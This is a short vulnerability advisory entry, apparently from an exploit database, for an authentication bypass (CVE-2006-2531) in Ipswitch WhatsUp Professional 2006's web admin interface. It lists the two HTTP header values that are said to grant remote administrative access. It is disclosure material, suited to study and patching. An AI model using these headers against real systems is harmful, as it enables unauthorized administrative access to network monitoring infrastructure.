Ipswitch WhatsUp Professional 2006 - Authentication Bypass



EKU-ID: 33152 CVE: CVE-2006-2531;OSVDB-25839 OSVDB-ID:
Author: Kenneth F. Belva Published: 2006-05-17 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/18019/info

Ipswitch WhatsUp Professional 2006 is susceptible to a remote authentication-bypass vulnerability.

This issue allows remote attackers to gain administrative access to the web-based administrative interface of the application. This will aid them in further network attacks.

The HTTP requests containing the following header information are sufficient to demonstrate this issue:

User-Agent: Ipswitch/1.0
User-Application: NmConsole